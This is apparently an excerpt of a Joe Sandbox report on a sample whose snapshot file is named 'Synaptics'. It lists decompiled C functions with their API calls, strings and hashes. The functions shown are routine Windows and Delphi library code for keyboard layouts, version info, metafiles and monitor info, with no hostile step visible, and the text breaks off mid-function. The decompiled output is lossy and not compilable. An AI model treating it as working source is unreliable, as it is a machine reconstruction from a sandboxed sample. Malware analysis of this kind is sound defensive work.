                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000040,?,00000000,0045860F,?,021E1320,?,00458671,00000000,?,0043D4D3), ref: 004584BA
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00458522
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 0045855C
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,004585D2,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 004585C5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0045850C
                                                                                                                                                                                                                            • layout text, xrefs: 00458553
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                                                                                                                                                            • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                                                                                                                                                            • API String ID: 1703357764-2652665750
                                                                                                                                                                                                                            • Opcode ID: df926e6deaf19fa000fafb0216c6eac1fe6f0f171fb7691c1be8eeb1514cdfa6
                                                                                                                                                                                                                            • Instruction ID: 7c903f8fd9ad85d3247752ddaabe7f8220cad0ab59f1ef766b0bf81713acb4c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df926e6deaf19fa000fafb0216c6eac1fe6f0f171fb7691c1be8eeb1514cdfa6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D415174A0420DAFDB10DF55C981B9EB7F8EB48305F5140EAE904B7352DB78AE04CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E00474948(char __eax, void* __ebx, void* __ecx, char __edx) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				signed short* _v36;
	char _v40;
	char _v44;
	char _v48;
	char _v52;
	signed int _v56;
	char _v60;
	signed int _v64;
	intOrPtr _t52;
	void* _t65;
	intOrPtr _t71;
	intOrPtr _t76;
	void* _t93;
	intOrPtr _t101;
	intOrPtr _t103;
	void* _t109;
	void* _t110;
	intOrPtr _t111;

	_t109 = _t110;
	_t111 = _t110 + 0xffffffc4;
	_v40 = 0;
	_t93 = __ecx;
	_v12 = __edx;
	_v8 = __eax;
	E00404E70(_v8);
	E00404E70(_v12);
	_push(_t109);
	_push(0x474ab3);
	_push( *[fs:eax]);
	 *[fs:eax] = _t111;
	E004049C0(__ecx);
	_v32 = 0xff;
	_push( &_v28);
	_t52 = E00404ED8( &_v8);
	_push(_t52);
	L004072A8();
	_v24 = _t52;
	if(_v24 == 0) {
		_pop(_t101);
		 *[fs:eax] = _t101;
		_push(E00474ABA);
		E004049C0( &_v40);
		return E004049E4( &_v12, 2);
	} else {
		_v16 = E0040275C(_v24);
		_push(_t109);
		_push(0x474a89);
		_push( *[fs:eax]);
		 *[fs:eax] = _t111;
		_push(_v16);
		_push(_v24);
		_push(_v28);
		_t65 = E00404ED8( &_v8);
		_push(_t65);
		L004072A0();
		if(_t65 != 0) {
			_push( &_v32);
			_push( &_v36);
			_push("\\VarFileInfo\\Translation");
			_t71 = _v16;
			_push(_t71);
			L004072B0();
			if(_t71 != 0) {
				_v64 =  *_v36 & 0x0000ffff;
				_v60 = 0;
				_v56 = E004079DC( *_v36) & 0x0000ffff;
				_v52 = 0;
				_v48 = _v12;
				_v44 = 0xb;
				E0040A664("\\StringFileInfo\\%0.4x%0.4x\\%s", 2,  &_v64,  &_v40);
				E00404A58( &_v12, _v40);
			}
			_push( &_v32);
			_push( &_v20);
			_push(E00404ED8( &_v12));
			_t76 = _v16;
			_push(_t76);
			L004072B0();
			if(_t76 != 0) {
				E0040A174(_v20, _t93);
			}
		}
		_pop(_t103);
		 *[fs:eax] = _t103;
		_push(E00474A90);
		return E0040277C(_v16);
	}
}

                                                                                                                                                                                                                            0x00474a75
                                                                                                                                                                                                                            0x00474a78
                                                                                                                                                                                                                            0x00474a88
                                                                                                                                                                                                                            0x00474a88

APIs
• 73AC14E0.VERSION(00000000,?,00000000,00474AB3,?,021E2354), ref: 00474995
• 73AC14C0.VERSION(00000000,?,00000000,00000001,00000000,00474A89,?,00000000,?,00000000,00474AB3,?,021E2354), ref: 004749D5
• 73AC1500.VERSION(00000001,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,00000001,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749F3
• 73AC1500.VERSION(00000001,00000000,?,000000FF,00000001,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,00000001,00000000,00474A89,?,00000000), ref: 00474A5D

Strings
• \StringFileInfo\%0.4x%0.4x\%s, xrefs: 00474A33
• \VarFileInfo\Translation, xrefs: 004749EA

Memory Dump Source
• Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd

Yara matches

Similarity
• API ID: C1500
• String ID: \StringFileInfo\%0.4x%0.4x\%s$\VarFileInfo\Translation
• API String ID: 1255762788-999260334
• Opcode ID: d9d274d5b90975b1e4479b0a80aa488c88212d9471dffcee97b3aec67d3ca969
• Instruction ID: 32f586d465f208a33ace568febe6e2dc1f3a77b47997a46495fde34554132249
• Opcode Fuzzy Hash: d9d274d5b90975b1e4479b0a80aa488c88212d9471dffcee97b3aec67d3ca969
• Instruction Fuzzy Hash: 7941ECB1D04209AFDB01EBE5D981AEFB7F8AB48304F50447AF514F3291D738AE048B69

Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 70%
E004288B4(void* __eax, void* __edx) {
    BYTE* _v8;
    int _v12;
    struct HDC__* _v16;
    short _v18;
    signed int _v24;
    short _v26;
    short _v28;
    char _v38;
    void* __ebx;
    void* __ebp;
    signed int _t35;
    struct HDC__* _t43;
    void* _t65;
    intOrPtr _t67;
    intOrPtr _t77;
    void* _t80;
    void* _t83;
    void* _t85;
    intOrPtr _t86;

    _t83 = _t85;
    _t86 = _t85 + 0xffffffdc;
    _t80 = __edx;
    _t65 = __eax;
    if( *((intOrPtr*)(__eax + 0x28)) == 0) {
        return __eax;
    } else {
        E004032B4( &_v38, 0x16);
        _t67 =  *((intOrPtr*)(_t65 + 0x28));
        _v38 = 0x9ac6cdd7;
        _t35 =  *((intOrPtr*)(_t67 + 0x18));
        if(_t35 != 0) {
            _v24 = _t35;
        } else {
            _v24 = 0x60;
        }
        _v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
        _v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
        _t43 = E00426DA8( &_v38);
        _v18 = _t43;
        _push(0);
        L00407638();
        _v16 = _t43;
        _push(_t83);
        _push(0x4289ef);
        _push( *[fs:eax]);
         *[fs:eax] = _t86;
        _v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
        _v8 = E0040275C(_v12);
        _push(_t83);
        _push(0x4289cf);
        _push( *[fs:eax]);
         *[fs:eax] = _t86;
        if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
            E00425FB8(_t67);
        }
        E0041D904(_t80, 0x16,  &_v38);
        E0041D904(_t80, _v12, _v8);
        _pop(_t77);
         *[fs:eax] = _t77;
        _push(0x4289d6);
        return E0040277C(_v8);
    }
}






















                                                                                                                                                                                                                            0x00428993
                                                                                                                                                                                                                            0x00428995
                                                                                                                                                                                                                            0x00428995
                                                                                                                                                                                                                            0x004289a4
                                                                                                                                                                                                                            0x004289b1
                                                                                                                                                                                                                            0x004289b8
                                                                                                                                                                                                                            0x004289bb
                                                                                                                                                                                                                            0x004289be
                                                                                                                                                                                                                            0x004289ce
                                                                                                                                                                                                                            0x004289ce

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,000009EC), ref: 00428906
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,000009EC), ref: 0042891D
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00428934
                                                                                                                                                                                                                            • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004289EF,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00428958
                                                                                                                                                                                                                            • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004289CF,?,?,00000000,00000000,00000008,?,00000000,004289EF), ref: 0042898B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BitsFileMeta
                                                                                                                                                                                                                            • String ID: `
                                                                                                                                                                                                                            • API String ID: 858000408-2679148245
                                                                                                                                                                                                                            • Opcode ID: 758f6c39527f4397bb5ac8e9337bbea5d287d3cdd1cc4b9367fbb58d6a4b21e7
                                                                                                                                                                                                                            • Instruction ID: f2e5e9c8815675a612d27dd2057d142453f41d2d556f4b9068e3620b80c0e0fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 758f6c39527f4397bb5ac8e9337bbea5d287d3cdd1cc4b9367fbb58d6a4b21e7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6314575B00218ABDB01EFD5D882ABEB7B8EF4D704F50445AF904FB281D678AD40D7A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 56%
                                                                                                                                                                                                                            			E00448DC4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t41;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t45 = _t46;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                            				_t28 = __eax;
                                                                                                                                                                                                                            				if( *0x49eba0 == 0) {
                                                                                                                                                                                                                            					 *0x49eba0 = E0040D9DC("comctl32.dll", __eax);
                                                                                                                                                                                                                            					if( *0x49eba0 >= 0x60000) {
                                                                                                                                                                                                                            						_t41 = GetModuleHandleA("comctl32.dll");
                                                                                                                                                                                                                            						if(_t41 != 0) {
                                                                                                                                                                                                                            							 *0x49eba4 = GetProcAddress(_t41, "ImageList_WriteEx");
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v8 = E00422634(_t43, 1, 0);
                                                                                                                                                                                                                            				_push(_t45);
                                                                                                                                                                                                                            				_push(0x448ebe);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t46;
                                                                                                                                                                                                                            				if( *0x49eba4 == 0) {
                                                                                                                                                                                                                            					_t9 = _v8;
                                                                                                                                                                                                                            					if(_t9 != 0) {
                                                                                                                                                                                                                            						_t9 = _t9 - 0xffffffec;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t9);
                                                                                                                                                                                                                            					_t11 = E00447D0C(_t28);
                                                                                                                                                                                                                            					_push(_t11);
                                                                                                                                                                                                                            					L0042C4AC();
                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                            						_t33 =  *0x49d9c8; // 0x422f10
                                                                                                                                                                                                                            						E0040D200(_t33, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t17 = _v8;
                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                            						_t17 = _t17 - 0xffffffec;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t17);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(E00447D0C(_t28));
                                                                                                                                                                                                                            					if( *0x49eba4() != 0) {
                                                                                                                                                                                                                            						_t34 =  *0x49d9c8; // 0x422f10
                                                                                                                                                                                                                            						E0040D200(_t34, 1);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t37);
                                                                                                                                                                                                                            				 *[fs:eax] = _t37;
                                                                                                                                                                                                                            				_push(0x448ec5);
                                                                                                                                                                                                                            				return E00403BEC(_v8);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            0x00448e9e
                                                                                                                                                                                                                            0x00448ea3
                                                                                                                                                                                                                            0x00448ea3
                                                                                                                                                                                                                            0x00448e3d
                                                                                                                                                                                                                            0x00448e3d
                                                                                                                                                                                                                            0x00448e42
                                                                                                                                                                                                                            0x00448e44
                                                                                                                                                                                                                            0x00448e44
                                                                                                                                                                                                                            0x00448e47
                                                                                                                                                                                                                            0x00448e48
                                                                                                                                                                                                                            0x00448e51
                                                                                                                                                                                                                            0x00448e5a
                                                                                                                                                                                                                            0x00448e5c
                                                                                                                                                                                                                            0x00448e69
                                                                                                                                                                                                                            0x00448e6e
                                                                                                                                                                                                                            0x00448e6e
                                                                                                                                                                                                                            0x00448e5a
                                                                                                                                                                                                                            0x00448eaa
                                                                                                                                                                                                                            0x00448ead
                                                                                                                                                                                                                            0x00448eb0
                                                                                                                                                                                                                            0x00448ebd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC14E0.VERSION(00000000,?,00000000,0040DAB2), ref: 0040DA1E
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC14C0.VERSION(00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA53
                                                                                                                                                                                                                              • Part of subcall function 0040D9DC: 73AC1500.VERSION(?,0040DAC4,?,?,00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA6D
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00448DF8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00448E09
                                                                                                                                                                                                                            • 73751DE0.COMCTL32(00000000,?,00000000,00448EBE), ref: 00448E88
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 73751AddressC1500HandleModuleProc
                                                                                                                                                                                                                            • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                                                                                                                                            • API String ID: 3699963180-3125200627
                                                                                                                                                                                                                            • Opcode ID: 028d70da097bf102ce3fdd8d86104c966a5ad625aa96c2d517d76ee05a24afb6
                                                                                                                                                                                                                            • Instruction ID: 78786ebc40bd40dec1c5389fa6359cb69700be1fbc3bb7ccab78b7c5a69fbc81
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 028d70da097bf102ce3fdd8d86104c966a5ad625aa96c2d517d76ee05a24afb6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3214870A04201ABE710EB7ADD56B6F36A8AB55708B60057FF805E72A2DF7DAC00D61D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 47%
                                                                                                                                                                                                                            			E0042C900(intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                            				void _v20;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t29 = _a8;
                                                                                                                                                                                                                            				_t27 = _a4;
                                                                                                                                                                                                                            				if( *0x49e92d != 0) {
                                                                                                                                                                                                                            					_t24 = 0;
                                                                                                                                                                                                                            					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						_t31 = _t29;
                                                                                                                                                                                                                            						 *(_t31 + 0x24) = 1;
                                                                                                                                                                                                                            						if( *_t31 >= 0x4c) {
                                                                                                                                                                                                                            							_push("DISPLAY");
                                                                                                                                                                                                                            							_push(_t31 + 0x28);
                                                                                                                                                                                                                            							L00407298();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t24 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t26 =  *0x49e914; // 0x42c900
                                                                                                                                                                                                                            					 *0x49e914 = E0042C4FC(5, _t23, _t26, _t27, _t29);
                                                                                                                                                                                                                            					_t24 =  *0x49e914(_t27, _t29);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C958
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C96D
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C978
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C9A2
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfoA
                                                                                                                                                                                                                            • API String ID: 2545840971-1370492664
                                                                                                                                                                                                                            • Opcode ID: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                                                                                                                                                                                            • Instruction ID: f52c56f8859c3bc03712ace229276911b675d95da7c00cdafe0d7f24be773c7c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E11B4F17017249FD720DF61AC84BABB7A8FB4A310F40493FE94597250D375A940C7AA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 47%
                                                                                                                                                                                                                            			E0042C9D4(intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                            				void _v20;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t29 = _a8;
                                                                                                                                                                                                                            				_t27 = _a4;
                                                                                                                                                                                                                            				if( *0x49e92e != 0) {
                                                                                                                                                                                                                            					_t24 = 0;
                                                                                                                                                                                                                            					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						_t31 = _t29;
                                                                                                                                                                                                                            						 *(_t31 + 0x24) = 1;
                                                                                                                                                                                                                            						if( *_t31 >= 0x4c) {
                                                                                                                                                                                                                            							_push("DISPLAY");
                                                                                                                                                                                                                            							_push(_t31 + 0x28);
                                                                                                                                                                                                                            							L00407298();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t24 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t26 =  *0x49e918; // 0x42c9d4
                                                                                                                                                                                                                            					 *0x49e918 = E0042C4FC(6, _t23, _t26, _t27, _t29);
                                                                                                                                                                                                                            					_t24 =  *0x49e918(_t27, _t29);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042CA2C
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CA41
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CA4C
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042CA76
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfoW
                                                                                                                                                                                                                            • API String ID: 2545840971-2774842281
                                                                                                                                                                                                                            • Opcode ID: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                                                                                                                                                                                            • Instruction ID: da6544c83ea616b7bbcbecc7cac92abfbfd15a320570470bed168d46318f2a96
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D11103B1B413289FD760CF61AC84BAFB7A8FB06310F40493BE85597290D375A944CBA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E00428F38(int __eax, void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				struct tagRGBQUAD _v1044;
                                                                                                                                                                                                                            				int _t16;
                                                                                                                                                                                                                            				struct HDC__* _t18;
                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t16 = __eax;
                                                                                                                                                                                                                            				_t46 = _t48;
                                                                                                                                                                                                                            				_t49 = _t48 + 0xfffffbf0;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t43 = __eax;
                                                                                                                                                                                                                            				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t16 = E004267F4(_v8, 0xff,  &_v1044);
                                                                                                                                                                                                                            					_t34 = _t16;
                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						L00407638();
                                                                                                                                                                                                                            						_v12 = _t16;
                                                                                                                                                                                                                            						_t18 = _v12;
